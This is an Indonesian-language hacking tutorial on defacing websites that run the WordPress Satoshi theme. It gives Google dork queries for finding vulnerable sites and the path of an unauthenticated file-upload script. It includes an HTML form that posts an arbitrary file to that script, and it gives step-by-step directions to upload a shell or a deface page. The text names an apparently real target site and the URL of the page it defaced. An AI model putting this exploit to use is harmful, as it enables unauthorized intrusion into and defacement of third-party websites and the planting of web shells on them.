Deface
Deface
MATERI/TUTORIAL BY:
MR.Tyr3X
TEAM:
IndoSec
HEY HO WUZZUP GUYS, KALI INI GW KASIH MATERI DEFACE DENGAN POC
WORDPRESS SATOSHI THEME VULNERABILITY UPLOAD WITH CSRF
DORK:
-inurl:/wp-content/themes/satoshi/
-intext:Design By Voosh Themes
-inurl:/wp-content/themes/satoshi/
-intext:Design By TecnoGe Informatica
Exploit: contoh.com/wp-content/themes/satoshi/upload-file.php
==============================================================
CSRF
<link href="http://fonts.googleapis.com/css?family=Black+Ops+One|Montserrat|
Cabin+Sketch|Orbitron|Architects+Daughter|Permanent+Marker|Luckiest+Guy|
Cherry+Cream+Soda" rel="stylesheet" />
<center><img src="https://media.giphy.com/media/gHuHATPXBngZfB0pas/giphy.gif"
width="963"/></center>
<html>
<head>
<title>BCA-X666X-TEAM</title>
<br>
<br><br><br>
<br>
<center><font size="5"><font color="aqua" face="Black Ops One" size="5"><marquee
behavior="scroll" direction="left" scrollamount="10" scrolldelay="5"
width="100%">[+] MILITARY CYBER CODERS |~| MIDNIGHT ATTACKER TEAM |~| BANYUMAS
CYBER TEAM |~| INFINITY CYBER TEAM |~| CYBER TROJAN INDONESIA |~| WHITE EYES
ATTACKER [+] </marquee></center></font>
</head>
<body bgcolor="black">
</body>
</html>
<form enctype="multipart/form-data"
action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post">
YOUR FILE: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
STEP BY STEP:
WEB TARGET:
http://wordsmyth.se/
1. DORKING AT GOOGLE
EXPLOITER:
wp-content/themes/satoshi/upload-file.php
INFORMATION:
BILA TAMPILAN BLANK ATAU KOSONG BIASANYA VULN
3. MASUK KE CSRF YANG SUDAH KALIAN SIAPKAN, MASUKAN WEB TARGET KALIAN KE CSRF
BESERTA EXPLOIT NYA, BUKABUKA CSRF KALIAN, LALU UPLOAD SHELL/HTML
JIKA ADA PATCH NYA, JANGAN LUPA DI SERTAKAN JUGA PATCH NYA, JIKA WEB NYA MEMASANG
PATCH
6. BERHUBUNGAN GW DISINI HANYA UPLOAD SCRIPT DEFACE HTML, JADI GW PAKE CARA MANGGIL
YANG INI
https://www.website.com/wp-content/themes/satoshi/images/script.html
HASIL:
http://wordsmyth.se/wp-content/themes/satoshi/images/!!.html
OKE SEKIAN TERIMA KASIH, SEMOGA BERMANFAAT DAN SEMOGA KALIAN BISA MEMAHAMI
REGARD:
MR-X666X
TEAM:
BLACK CODERS ANONYMOUS SATANIC EXPLOITER